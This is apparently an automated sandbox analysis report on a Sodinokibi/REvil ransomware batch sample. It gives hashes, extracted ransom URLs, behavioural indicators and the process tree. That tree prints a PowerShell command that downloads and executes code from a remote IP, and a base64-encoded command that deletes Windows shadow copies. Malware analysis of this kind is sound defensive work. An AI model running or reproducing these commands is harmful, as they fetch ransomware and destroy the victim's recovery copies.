Analysis
-
max time kernel
145s -
max time network
73s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
15-05-2020 19:19
Static task
static1
Behavioral task
behavioral1
Sample
55022f44a9c2dac0916e9db3842398df.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
55022f44a9c2dac0916e9db3842398df.bat
Resource
win10v200430
General
-
Target
55022f44a9c2dac0916e9db3842398df.bat
-
Size
219B
-
MD5
07ea4461f7fc0758bb7fb455966df5d9
-
SHA1
2df15ea78ad89a7816a69bab5656274115bed854
-
SHA256
dd540cd255b16f023dee940fffa52d054726d7f2c1c9aeaeafc4f594a3e2a5f1
-
SHA512
b0ea53a6359157114b09bddf227d1bfedcd7db302c356e99e1086b736fc003b6a2f40647a6feecf6f5642104bbf8e7b9a49668c29a5f1c0857fcf1538419414d
Malware Config
Extracted
http://185.103.242.78/pastes/55022f44a9c2dac0916e9db3842398df
Extracted
C:\8hf7h555kv-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A44A9E362E12D1C0
http://decryptor.cc/A44A9E362E12D1C0
Signatures
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 1328 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\887958rj9j7e4.bmp" powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1328 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1296 wrote to memory of 1328 1296 cmd.exe powershell.exe PID 1328 wrote to memory of 112 1328 powershell.exe powershell.exe PID 1328 wrote to memory of 112 1328 powershell.exe powershell.exe PID 1328 wrote to memory of 112 1328 powershell.exe powershell.exe PID 1328 wrote to memory of 112 1328 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 112 powershell.exe Token: SeBackupPrivilege 760 vssvc.exe Token: SeRestorePrivilege 760 vssvc.exe Token: SeAuditPrivilege 760 vssvc.exe Token: SeTakeOwnershipPrivilege 1328 powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 112 powershell.exe 112 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe -
Drops file in Program Files directory 15 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\microsoft sql server compact edition\8hf7h555kv-readme.txt powershell.exe File opened for modification \??\c:\program files\PushExit.eps powershell.exe File opened for modification \??\c:\program files\ReceiveRestart.m4v powershell.exe File opened for modification \??\c:\program files\SuspendSync.aifc powershell.exe File created \??\c:\program files (x86)\8hf7h555kv-readme.txt powershell.exe File opened for modification \??\c:\program files\EnterEnable.mpv2 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\8hf7h555kv-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\8hf7h555kv-readme.txt powershell.exe File opened for modification \??\c:\program files\CompleteRepair.vbe powershell.exe File opened for modification \??\c:\program files\SkipRequest.raw powershell.exe File opened for modification \??\c:\program files\CheckpointNew.3gp powershell.exe File opened for modification \??\c:\program files\ProtectUnblock.mpg powershell.exe File created \??\c:\program files\8hf7h555kv-readme.txt powershell.exe File opened for modification \??\c:\program files\AddSplit.png powershell.exe File opened for modification \??\c:\program files\LimitInstall.emf powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\55022f44a9c2dac0916e9db3842398df.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/55022f44a9c2dac0916e9db3842398df');Invoke-PJRBBLOXXKAL;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in Program Files directory
PID:1328 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:112
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:760